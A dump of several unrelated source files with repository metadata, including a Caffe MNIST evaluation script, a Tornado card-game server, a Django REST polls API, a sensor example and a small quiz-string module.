PdfSetNames = cms.untracked.vstring(
"cteq66.LHgrid"
, "MRST2006nnlo.LHgrid"
, "NNPDF10_100.LHgrid"
)
)
|
[
"shervin@cern.ch"
] |
shervin@cern.ch
|
7a01f23b1d83f8f97510a946715871ec8f1d5700
|
6d63fb09abb41f2c3f6ba66091b8c0507044104d
|
/py/liu.py
|
3d41ef1913f6c48a13f1ebb8c86ac5ac6a627c48
|
[] |
no_license
|
buaaswf/backup-my-projects
|
dbc3d0c4ac5af38b4b8ce07be7978e3ff36cf75c
|
73577385da85fdd5899cb471220dd8334ca603bc
|
refs/heads/master
| 2021-04-15T03:44:06.248881
| 2018-03-22T08:58:36
| 2018-03-22T08:58:36
| 126,304,153
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,242
|
py
|
#!/usr/bin/env python
# encoding: utf-8
import numpy as np
import sys
from sklearn.metrics import classification_report
sys.path.insert(0,"/home/s.li/2017/gpu4/caffe-segnet-cudnn5/python")
import matplotlib.pyplot as plt
import caffe
import os
import scipy.io
import shutil
from mnist_single_plot_roc import drawroc
# Make sure that caffe is on the python path:
from sklearn.metrics import confusion_matrix
from tsne.tsne_1 import tsnepng
def vis_square(resname, data, padsize=1, padval=0):
data -= data.min()
data /= data.max()
# force the number of filters to be square
n = int(np.ceil(np.sqrt(data.shape[0])))
padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)
data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))
# tile the filters into an image
data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))
data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])
plt.imsave(resname, data)
def GetFileList(dir, fileList):
newDir = dir
if os.path.isfile(dir):
fileList.append(dir.decode('gbk'))
elif os.path.isdir(dir):
for s in os.listdir(dir):
#如果需要忽略某些文件夹,使用以下代码
if s.endswith(".txt") or s.endswith(".sh") or s.endswith(".py"):
continue
#if int(s)>998 and int(s) < 1000:
newDir=os.path.join(dir,s)
GetFileList(newDir, fileList)
return fileList
#dir = '/home/s.li/caffe0719/caffe-master/data/face/patch/casia1000/fullpathval.txt'
def labelfile(dir):
lines = []
with open (dir,'r') as f:
lines = [line.strip().split(' ') for line in f ]
#paths = [line[0] for line in lines]
#labels = [line[1] for line in lines]
# print lines
return lines
if len(sys.argv) != 4:
print "Usage: python multifc.py inputimagedir feature.mat labeldir"
# sys.exit()
def loadmodel(caffepath='../',modelpath='models/casiaface/casia.caffemodel',deployroot='models/casiaface/casia_train_deploy.prototxt',meanroot='data/idface/casia_web.npy',shapelist=[64,3,100,100]):
# caffe_root = caffepath # this file is expected to be in {caffe_root}/examples
caffe_root = "/home/s.li/2017/gpu4/caffe-segnet-cudnn5/"# this file is expected to be in {caffe_root}/examples
sys.path.insert(0, caffe_root + 'python')
plt.rcParams['figure.figsize'] = (10, 10)
plt.rcParams['image.interpolation'] = 'nearest'
params = {'legend.fontsize':20}
plt.rcParams.update(params)
# plt.rcParams['image.cmap'] = 'gray'
model =modelpath
if not os.path.isfile(model):
print("Downloading pre-trained CaffeNet model...")
caffe.set_mode_cpu()
net = caffe.Net(deployroot,model,caffe.TEST)
# input preprocessing: 'data' is the name of the input blob == net.inputs[0]
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2, 0, 1))
# transformer.set_mean('data', np.load(caffe_root + meanroot).mean(1).mean(1)) # mean pixel
blob = caffe.proto.caffe_pb2.BlobProto()
data = open( meanroot , 'rb' ).read()
blob.ParseFromString(data)
arr = np.array( caffe.io.blobproto_to_array(blob) )
out = arr[0]
transformer.set_mean('data', out.mean(1).mean(1)) # mean pixel
transformer.set_raw_scale('data', 255) # the reference model operates on images in [0,255] range instead of [0,1]
transformer.set_channel_swap('data', (2, 1, 0)) # the reference model has channels in BGR order instead of RGB
# set net to batch size of 50
net.blobs['data'].reshape(shapelist[0], shapelist[1], shapelist[2], shapelist[3])
return net,transformer
def image2mat(net,transformer,inputimagedir,outdir,labelfilepath,layername):
#inputimagedir = sys.argv[1]
mat = []
# lines = labelfile(labelfilepath)
# print lines
labels = []
pred = []
predroc= []
nn = 0
caffe.set_mode_gpu()
allimages= GetFileList(inputimagedir, [])
testimages =allimages
# from random import shuffle
import random
# print allimages
random.shuffle(testimages)
errorimagelist="./error/mnist_result/"+outdir.split(".")[0]
if not os.path.exists(errorimagelist):
os.makedirs(errorimagelist)
# print testimages
for image in testimages:
# print image,
gtlabel = int(image.split("/")[-2])
# print gtlabel
try:
net.blobs['data'].data[...] = transformer.preprocess('data', caffe.io.load_image(image))
except Exception, e:
print nn
print str(e)
nn += 1
continue
out = net.forward()
# pred.append(str(out['prob'].argmax()))
# print (out['prob'].shape)
# pred.append(out['prob'][1])
# print("image is {}Predicted class is #{}.".format(image,out['prob'].argmax()))
if out['prob'].argmax()!=gtlabel:
print out['prob'].argmax(),gtlabel
shutil.copy(image,errorimagelist+"/"+image.split("/")[-1].split(".")[0]+"_pred_"+str(out['prob'].argmax())+".png")
# caffe.set_mode_gpu()
# caffe.set_device(0)
#net.forward() # call once for allocation
# %timeit net.forward()
# feat = net.blobs[layername].data[1]
feat = net.blobs[net.blobs.keys()[-2]].data[0]
# for layer_name, param in net.params.iteritems():
# print layer_name + '\t' + str(param[0].data.shape), str(param[1].data.shape)
# print net.blobs.keys()
# filters = net.params['conv1'][0].data
# print filters
predroc.append(net.blobs[net.blobs.keys()[-1]].data[0].flatten())
pred.append(np.argmax(net.blobs[net.blobs.keys()[-1]].data[0].flatten()))
# print "===>>",net.blobs[net.blobs.keys()[-1]].data[0].flatten()
# pred.append(out['prob'])
# print out['prob']
# print net.blobs[net.blobs.keys()[-2]].data[0]
#np.savetxt(image+'feature.txt', feat.flat)
#print type(feat.flat)
featline = feat.flatten()
# print featline
#print type(featline)
#featlinet= zip(*(featline))
mat.append(featline)
label=image.split("/")[-2]
# labels.append(str(lines[nn][1]))
labels.append(int(label))
# print "===>>",out['prob'].argmax()
# print "=====>>",lines[nn][1]
if (nn%100==0):
with open("./error/mnist_result/"+outdir,'w') as f:
scipy.io.savemat(f, {'data' :mat,'labels':labels}) #append
nn += 1
# print pred.shape
# tsnepng(mat,labels,"gootsne_"+outdir)
print "tsnepng=========================>>>>"
drawroc(labels,predroc,"./error/mnist_result/"+"zoomroc_10"+outdir.split('.')[0]+".png")
print "roc=========================>>>>"
print (classification_report(labels,pred))
text_file = open("./error/mnist_result/"+outdir.split('.')[0]+".txt", "w")
text_file.write(outdir.split('.')[0]+" model\n")
text_file.write(classification_report(labels,pred))
import pickle
with open("./error/mnist_result/"+outdir.split('.')[0]+"_pred.pkl","wb") as f:
pickle.dump(mat,f)
with open("./error/mnist_result/"+outdir.split('.')[0]+"_true.pkl","wb") as f:
pickle.dump(labels,f)
with open("./error/mnist_result/"+outdir,'w') as f:
scipy.io.savemat(f, {'data' :mat,'labels':labels}) #append
cm=confusion_matrix(pred, labels)
with open("./error/mnist_result/"+outdir.split(".")[0]+".pkl","wb") as f:
pickle.dump(cm,f)
print cm
np.savetxt("./error/mnist_result/"+outdir.split(".")[0]+"mfse"+".csv", cm, delimiter=",")
def batch_extrac_featuretomat():
#alexnet
# alexnetpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar10_alex/"
# alexnetpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar10_alex/"
alexnetpath="/home/s.li/2016/caffe1128/caffe-master/models/"
# googlenetpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar10_googlenet/"
# cifar10netpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar_cifar10/"
# svhn_cifar10netpath="/home/swf/caffe/analysisfeatures/oversample/svhn/cifar10net/"
# svhn_googlenetpath="/home/swf/caffe/analysisfeatures/oversample/svhn/googlenet/"
# svhn_alexnetpath="/home/swf/caffe/analysisfeatures/oversample/svhn/alexnet/"
# googlenetpath+"bvlc_googlenet_iter_520000.caffemodel",\
# googlenetpath+"oribvlc_googlenet_iter_520000.caffemodel",\
# modelist=[alexnetpath+"oriciafr10caffe_alexnet_train_iter_390000.caffemodel",\
# alexnetpath+"dvnciafr10caffe_alexnet_train_iter_450000.caffemodel",\
# modelist=[alexnetpath + "cifar10gen_caffe_alexnet_train_iter_130000.caffemodel",\
# modelist =[alexnetpath + "cifar10balanced0_caffe_alexnet_train_iter_410000.caffemodel",\
# modelist =[alexnetpath + "7caffe_alexnet_train_iter_30000.caffemodel",\
# modelist =[alexnetpath + "0509dvn/caffe_alexnet_train_iter_120000.caffemodel",\
# modelist =[alexnetpath + "10caffe_alexnet_train_iter_10000.caffemodel",\
modelist =[alexnetpath + "mnist/mnist_data/result1/caffe_alexnet_train_iter_140000.caffemodel",\
alexnetpath + "mnist/mnist_data/result2/caffe_alexnet_train_iter_120000.caffemodel",\
#alexnetpath + "mnist/mnist_data/result3/caffe_alexnet_train_iter_120000.caffemodel",\
#alexnetpath + "mnist/mnist_data/result4/caffe_alexnet_train_iter_120000.caffemodel",\
alexnetpath + "mnist/mnist_data/result5/caffe_alexnet_train_iter_120000.caffemodel",\
alexnetpath + "mnist/mnist_data/result6/caffe_alexnet_train_iter_120000.caffemodel",\
alexnetpath + "mnist/mnist_data/result7/caffe_alexnet_train_iter_50000.caffemodel",\
#alexnetpath + "mnist/mnist_data/result8/caffe_alexnet_train_iter_60000.caffemodel",\
alexnetpath + "mnist/mnist_data/result9/caffe_alexnet_train_iter_110000.caffemodel",\
alexnetpath + "mnist/mnist_data/result10/caffe_alexnet_train_iter_50000.caffemodel",\
alexnetpath + "mnist/mnist_data/result11/caffe_alexnet_train_iter_50000.caffemodel",\
]
datalist=["/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
#"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
#"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
#"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
]
deploylist=[alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
#alexnetpath+"bvlc_alexnet/deploy.prototxt",
#alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
#alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
]
# meanlist=[alexnetpath+"patchcifa10_256_mean.binaryproto",
meanlist=[alexnetpath+"mnist/mnist_data/mean/mean1.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean2.binaryproto",
#alexnetpath+"mnist/mnist_data/mean/mean3.binaryproto",
#alexnetpath+"mnist/mnist_data/mean/mean4.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean5.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean6.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean7.binaryproto",
#alexnetpath+"mnist/mnist_data/mean/mean8.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean9.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean10.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean11.binaryproto",
]
shapelists=[[10,3,227,227],[10,3,227,227],\
[10,3,227,227],[10,3,227,227],\
[10,3,227,227],[10,3,227,227],\
[10,3,227,227],[10,3,227,227]]#
# [32,3,224,224],[32,3,224,224],\
# [64,3,32,32],[64,3,32,32],[64,3,32,32],[64,3,32,32],
# [10,3,227,227],[10,3,227,227],[10,3,224,224],[10,3,224,224]]
labellist=["cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",]
#"cifa10_valdst.csv",]
# "svhn_ori_valdst.csv",]
# labellist=[""]
# outlist=["cifar10_alex_oversmaple.mat","cifar10_alex_ori.mat","cifar10_cifar10_dvn.mat",
# "cifar10_cifar10_ori.mat","cifar10_google_dvn.mat","cifar10_google_ori.mat",
# "svhn_cifar10_dvn.mat","svhn_cifar10_ori.mat","svhn_alex_dvn.mat","svhn_alex_ori.mat",
# "svhn_google_dvn.mat","svhn_google_ori.mat"
# ]
outlist=["alex_mfseoverh1.mat","alex_mfseoverh2.mat",
"alex_mfseoverh5.mat","alex_mfseoverh6.mat",
"alex_mfseoverh7.mat","alex_mfseoverh9.mat",
"alex_mfseoverh10.mat","alex_mfseoverh11.mat",]
#]
layernamelist=["fc8","fc8","fc8","fc8","fc8","fc8","fc8","fc8"]
# "ip1","ip1","fc8","fc8","loss3/classifier","loss3/classifier"]
# layernamelist=["fc8","fc8","loss3/classifier","loss3/classifier","ip1","ip1",
# "ip1","ip1","fc8","fc8","loss3/classifier","loss3/classifier"]
import traceback
# for i in range(len(modelist)-1,len(modelist)):
for i in range(0,len(modelist)):
# for i in range(0,1):
# if i<4 and i>1:
# continue
# for i in range(2,4):
try:
print modelist[i]
net,transformer=loadmodel(modelpath=modelist[i],deployroot=deploylist[i],
meanroot=meanlist[i],shapelist=shapelists[i])
image2mat(net,transformer,datalist[i],outlist[i],labellist[i],layernamelist[i])
except Exception as e:
print e
print traceback.format_exc()
# break
continue
#argv[0] inputimagedir argv[1] labelfile
if __name__=='__main__':
# if len(sys.argv)!=3:
# print "Usage:python{}inputimagedir outdir labelfile".format(sys.argv[0])
batch_extrac_featuretomat()
#net,transformer=loadmodel(sys.argv[0],sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])
# net,transformer=loadmodel(modelpath='models/cifa10/cifar10_19layers_iter_200000.caffemodel',deployroot="models/cifa10/cifar10_deploy.prototxt",meanroot="data/cifar10-gcn-leveldb-splits/paddedmean.npy",shapelist=[100,3,32,32])
# # net,transformer=loadmodel(modelpath='models/cifa10/cifar10_19layers_iter_200000.caffemodel',deployroot="models/scene/deploy.prototxt",shapelist=[50,3,100,100])
# image2mat(net,transformer,sys.argv[1],sys.argv[2],sys.argv[3])#argv[0] inputimagedir argv[1] labelfile
#def loadmodel(cafferoot,modelpath,deployroot,meanroot,shapelist=[64,3,100,100]):
|
[
"noreply@github.com"
] |
buaaswf.noreply@github.com
|
e27d03897ae226bf6eafffa5093cee07b628880d
|
a1dd6f2e13506b54120532c2ed093dc270eff4ac
|
/GridServices/TransactiveControl/TNT_Version1/TNSAgent/tns/transactive_record.py
|
3f466148e9947fe21eff8fd0e8fe6acc846f3d6b
|
[
"BSD-3-Clause"
] |
permissive
|
shwethanidd/volttron-pnnl-applications-2
|
ec8cc01c1ffeff884c091617892fea6e84a3e46e
|
24d50729aef8d91036cc13b0f5c03be76f3237ed
|
refs/heads/main
| 2023-06-18T12:13:13.607951
| 2021-06-30T23:00:01
| 2021-06-30T23:00:01
| 359,586,385
| 0
| 0
|
BSD-3-Clause
| 2021-04-19T20:15:45
| 2021-04-19T20:15:45
| null |
UTF-8
|
Python
| false
| false
| 4,505
|
py
|
"""
Copyright (c) 2020, Battelle Memorial Institute
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those
of the authors and should not be interpreted as representing official policies,
either expressed or implied, of the FreeBSD Project.
This material was prepared as an account of work sponsored by an agency of the
United States Government. Neither the United States Government nor the United
States Department of Energy, nor Battelle, nor any of their employees, nor any
jurisdiction or organization that has cooperated in th.e development of these
materials, makes any warranty, express or implied, or assumes any legal
liability or responsibility for the accuracy, completeness, or usefulness or
any information, apparatus, product, software, or process disclosed, or
represents that its use would not infringe privately owned rights.
Reference herein to any specific commercial product, process, or service by
trade name, trademark, manufacturer, or otherwise does not necessarily
constitute or imply its endorsement, recommendation, or favoring by the
United States Government or any agency thereof, or Battelle Memorial Institute.
The views and opinions of authors expressed herein do not necessarily state or
reflect those of the United States Government or any agency thereof.
PACIFIC NORTHWEST NATIONAL LABORATORY
operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
under Contract DE-AC05-76RL01830
"""
from datetime import datetime
from .time_interval import TimeInterval
from .helpers import format_ts
class TransactiveRecord:
def __init__(self, ti, rn, mp, p, pu=0.0, cost=0.0, rp=0.0, rpu=0.0, v=0.0, vu=0.0):
# NOTE: As of Feb 2018, ti is forced to be text, the time interval name,
# not a TimeInterval object.
# ti - TimeInterval object (that must be converted to its name)
# rn - record number, a nonzero integer
# mp - marginal price [$/kWh]
# p - power [avg.kW]
# These are the four normal arguments of the constructor.
# NOTE: Use the time interval ti text name, not a TimeInterval object itself.
if isinstance(ti, TimeInterval):
# A TimeInterval object argument must be represented by its text name.
self.timeInterval = ti.name
else:
# Argument ti is most likely received as a text string name. Further
# validation might be used to make sure that ti is a valid name of an
# active time interval.
self.timeInterval = ti
self.record = rn # a record number (0 refers to the balance point)
self.marginalPrice = mp # marginal price [$/kWh]
self.power = p # power [avg.kW]
# Source and target are obvious from Neighbor and filenames. Omit
# self.powerUncertainty = pu # relative [dimensionless]
self.cost = cost # ?
# self.reactivePower = rp # [avg.kVAR]
# self.reactivePowerUncertainty = rpu # relative [dimensionless]
# self.voltage = v # [p.u.]
# self.voltageUncertainty = vu # relative [dimensionless]
# Finally, create the timestamp that captures when the record is created.
self.timeStamp = datetime.utcnow()
|
[
"shwetha.niddodi@pnnl.gov"
] |
shwetha.niddodi@pnnl.gov
|
dcad9b56560d0941b2a0e5ed5d3b3e2336da3c37
|
0785df5c1d893a23a77b73617c1b5c10e6ac238f
|
/local.py
|
7dd3a4cb48cf307e906381640d9a3d04ea3eccd3
|
[] |
no_license
|
AnufrievaAnastasia/Project3
|
dd9482b2c1cb1722c4a1bcfd69f8c3f8210b7fbf
|
237bf9f9c04704a2e8a22ac4088d4ad805f8eeac
|
refs/heads/master
| 2020-08-23T05:03:21.903122
| 2019-10-21T11:21:05
| 2019-10-21T11:21:05
| 216,549,336
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,297
|
py
|
TXT_TASK = 'Игра "Правда или Ложь", на прохождение у вас только две попытки'
TXT_ANS_1 = 'Самым твердым природным материалом на Земле является титан '
TXT_ANS_2 = 'В среднем около 10 лет человек проводит во сне '
TXT_ANS_3 = 'Стрекозы - самые быстролетающие насекомые '
TXT_ANS_4 = 'Фильм "Титаник" стоил дороже, чем строительство самого судна в свое время, с учетом инфляции '
TXT_ANS_5 = 'В Норвегии посвятили в рыцари пингвина '
TXT_ANS_6 = 'Муравьи спят утром '
TXT_ANS_7 = 'Карамбола - морская рыба '
TXT_ANS_8 = 'Невежда - невоспитанный и грубый человек '
TXT_ANS_9 = 'В Новой Зеландии язык жестов имеет статус государственного '
TXT_ANS_10 = 'Dell - американская корпорация в области производства компьютеров '
TXT_TRUE = 'правда'
TXT_FALSE = 'ложь'
TXT_END = 'Игра ЗАКОНЧЕНА!'
TXT_WIN = 'Вы ВЫИГРАЛИ!'
|
[
"anufrieva_01@mail.ru"
] |
anufrieva_01@mail.ru
|
fc6660d4b5263329f3ba30e3115d2c3f11ba7cdc
|
36a5fb4183534c1f7e2523a80c510c4d59746fe9
|
/sgs/cmd_handlers.py
|
7bc5a5e76f1656a7f16962450eba8dd8fac19ae0
|
[] |
no_license
|
morningbzy/SGS
|
85856ce313a404430fab7fffc5dfc5f9603feaab
|
23db709af3e56d6082c8283ea2fd6f0caf10e85e
|
refs/heads/master
| 2021-01-15T13:18:19.315256
| 2013-08-07T15:38:39
| 2013-08-07T15:38:39
| 10,073,280
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,143
|
py
|
# -*- coding: UTF-8 -*-
import logging
import tornado.escape
import tornado.auth
import tornado.web
from sgs.user import global_users
from sgs.game import global_game
from sgs.cmd import Cmd
class BaseHandler(tornado.web.RequestHandler):
def get_current_user(self):
user_json = self.get_secure_cookie("user")
if not user_json:
return None
return tornado.escape.json_decode(user_json)
class AuthLoginHandler(BaseHandler):
def get(self):
self.render("login.html")
def post(self):
name = self.get_argument("name")
user_dict = {'pk': name, 'name': name}
if global_users.has_user(name):
# TODO: 恢复用户状态
self.redirect("/auth/login")
else:
global_users.add_user(**user_dict)
self.set_secure_cookie("user", tornado.escape.json_encode(user_dict))
self.redirect("/")
#class AuthLoginHandler(BaseHandler, tornado.auth.GoogleMixin):
# @tornado.web.asynchronous
# @gen.coroutine
# def get(self):
# if self.get_argument("openid.mode", None):
# user = yield self.get_authenticated_user()
# user_dict = tornado.escape.json_encode(user)
# self.set_secure_cookie("sgs_user", user_dict)
# self.redirect("/")
# return
# self.authenticate_redirect(ax_attrs=["name"])
class AuthLogoutHandler(BaseHandler):
def get(self):
self.clear_cookie("user")
self.write("You are now logged out")
class IndexHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
if not self.current_user\
or not global_users.has_user(self.current_user['pk']):
self.redirect('/auth/login')
else:
self.render("game.html")
class SgsCmdRequestHandler(BaseHandler):
@tornado.web.authenticated
def post(self):
cmd_args = self.request.arguments
cmd_args.pop('_xsrf', None)
cmd = cmd_args.pop('cmd')[0]
cmd_args = dict([(k, v[0]) if len(v) == 1 else v
for k, v in cmd_args.iteritems()])
user = global_users.get_user(self.current_user['pk'])
if user.seat_id is not None and 'seat_id' not in cmd_args:
cmd_args['seat_id'] = user.seat_id
cmd = Cmd(cmd, sender=user.pk, **cmd_args)
logging.info('<-- [%s] %s' % (cmd, cmd_args))
self.write(dict(cmds=[cmd.get_ack_cmd().to_simple_dict()]))
global_game.handle_cmd(cmd)
#global_users.broadcast_cmd(cmd)
@tornado.web.authenticated
@tornado.web.asynchronous
def get(self):
user_dict = self.get_current_user()
user = global_users.get_user(user_dict['pk'])
if user:
user.get_cmds(self.on_new_cmd)
else:
self.write(dict(cmds=[]))
def on_new_cmd(self, cmds):
# Closed client connection
if self.request.connection.stream.closed():
user = global_users.get_user(self.get_current_user()['pk'])
user.resend_cmd(cmds)
return
self.finish(dict(cmds=[cmds.to_simple_dict()]))
|
[
"morningbzy@gmail.com"
] |
morningbzy@gmail.com
|
405974db9681a1efc9bb65d55fa0ae64ee33d230
|
94470cf07f402b1c7824e92a852cd3203f94ac4a
|
/polls/apiviews.py
|
6f6ca88b9da4638cbf0f4888e4305f24fa9ffee5
|
[] |
no_license
|
jbeltranleon/pollsapi_django_rest
|
c509bf0b0c1e2db870ed8a4aaa1647bf74c5f8cd
|
0855820541064ffd77dbd1c6e77f695d4f18e517
|
refs/heads/master
| 2020-04-14T17:55:02.364183
| 2019-01-04T16:01:46
| 2019-01-04T16:01:46
| 163,999,126
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,203
|
py
|
from rest_framework import generics
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.response import Response
from .models import Poll, Choice
from .serializers import PollSerializer, ChoiceSerializer,\
VoteSerializer
class PollList(generics.ListCreateAPIView):
queryset = Poll.objects.all()
serializer_class = PollSerializer
class PollDetail(generics.RetrieveDestroyAPIView):
queryset = Poll.objects.all()
serializer_class = PollSerializer
class ChoiceList(generics.ListCreateAPIView):
def get_queryset(self):
queryset = Choice.objects.filter(poll_id=self.kwargs["pk"])
return queryset
serializer_class = ChoiceSerializer
class CreateVote(APIView):
def post(self, request, pk, choice_pk):
voted_by = request.data.get("voted_by")
data = {'choice': choice_pk, 'poll': pk, 'voted_by': voted_by}
serializer = VoteSerializer(data=data)
if serializer.is_valid():
vote = serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
|
[
"jbeltranleon@gmail.com"
] |
jbeltranleon@gmail.com
|
cdf669514aaf2c1d7c33248746135d7b0232f29f
|
184ab7b1f5d6c4a4382cf4ffcf50bbad0f157ef1
|
/library/aht10/aht10_example.py
|
46df77a8a71666025fda1409a3c5b7ebdbed9497
|
[] |
no_license
|
RT-Thread/mpy-snippets
|
fdd257bb9f44cdc92e52cd39cdc88a57d736fb26
|
9296d559da275f51845cb9c2f8e2010f66f72cc1
|
refs/heads/master
| 2023-06-14T02:20:05.449559
| 2020-06-03T02:34:47
| 2020-06-03T02:35:19
| 198,854,793
| 28
| 18
| null | 2020-05-06T11:32:46
| 2019-07-25T15:14:56
|
Python
|
UTF-8
|
Python
| false
| false
| 517
|
py
|
from machine import I2C, Pin
from aht10 import AHT10
PIN_CLK = 54 # PD6, get the pin number from get_pin_number.py
PIN_SDA = 33 # PC1
clk = Pin(("clk", PIN_CLK), Pin.OUT_OD) # Select the PIN_CLK as the clock
sda = Pin(("sda", PIN_SDA), Pin.OUT_OD) # Select the PIN_SDA as the data line
i2c = I2C(-1, clk, sda, freq=100000)
sensor = AHT10(i2c)
sensor.sensor_init()
sensor.is_calibration_enabled()
print("current temp: %.2f "%sensor.read_temperature())
print("current humi: %.2f %%"%sensor.read_humidity())
|
[
"SummerGift@qq.com"
] |
SummerGift@qq.com
|
86404a656d1321585c146107b8e2b33929d19370
|
809f119d53610261d71c5e9b5f620c41524868b1
|
/main.py
|
eb0ecb4bd43e420c3f19ab15dbdcc22cd75d1cd5
|
[] |
no_license
|
HackerulGogu/SnakeImpact
|
d07c9866ec8b4320c393b24fbd47793e0c03a140
|
c6c65f9e1de5cc446a56340ac0462cc4ed362b75
|
refs/heads/master
| 2021-04-11T04:19:15.420141
| 2020-03-21T14:51:55
| 2020-03-21T14:51:55
| 248,991,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15
|
py
|
print('merge')
|
[
"novaialex44@gmail.com"
] |
novaialex44@gmail.com
|
ecf5f0f62c51ab6359317746fd5f24df8967cb26
|
d268ee5da12d4eecc7bf97f37ec71ae58fe5854d
|
/data_set_prep/dataset_prep_scr.py
|
0cc7adb12c263a0b1b7b24868476e42d26b4213b
|
[] |
no_license
|
oiynick/rcnn_buildings
|
b5760727fc0063086362eaffe32e36e2fafc75e7
|
1be3d554e5e3a0bc13ed086c73f3a87f61e025d5
|
refs/heads/master
| 2020-04-28T08:57:19.537442
| 2019-03-21T12:54:29
| 2019-03-21T12:54:29
| 175,148,681
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,222
|
py
|
import numpy as np
import shapely
from aeronet import dataset as ds
def one_sample(fp_json, fp_tif):
# Read the JSON file and the TIF image
av_features = ds.vector.FeatureCollection.read(fp_json)
raster = ds.raster.Band(fp_tif)
# Image sizing info and setting up the coordinates
samples = raster.generate_samples(512, 512)
for i in samples:
# Taking bounds of the generated sample
bounds = i.bounds
# Create a shape of the polygon
area = shapely.geometry.polygon((bounds.min_point + bounds.max_point))
# Create a feature based on a shape
a_feature = ds.vector.Feature(area)
# Find the intersecting features
inter = av_features.intersection(a_feature)
# For every feature make a feature collection and raster data
for feature in inter:
offc = ds.vector.FeatureCollection(feature)
rasta = ds.transforms.rasterize(offc, i.transform, (512, 512))
yield rasta
def main():
amount = 1
res = np.empty(amount, [['complex']])
for i in range(amount):
fp_tif = '{}.tif'.format(i)
fp_json = '{}.json'.format(i)
res[i] = one_sample(fp_json, fp_tif)
|
[
"nikita.veliev@skoltech.ru"
] |
nikita.veliev@skoltech.ru
|
68ed6146980626889998a60eed343f5932d5d1a2
|
7e792f54abea89609fcc1317dbbc6b50012c56ec
|
/main.py
|
a360c9b3b6cb6ff0e81fd6148244159ed17ed374
|
[] |
no_license
|
sylvanusm/Bert-abstractive-summarisation
|
067ba2a53ae8a2d5e99f5024c77f29b52eadd39d
|
4e56bf0b2188b9684f4b1c2d59e60c5f6b8c090e
|
refs/heads/main
| 2023-06-07T17:19:47.812248
| 2021-06-26T10:28:52
| 2021-06-26T10:28:52
| 380,363,935
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,647
|
py
|
from model.transformer import Summarizer
from model.common_layer import evaluate
from utils import config
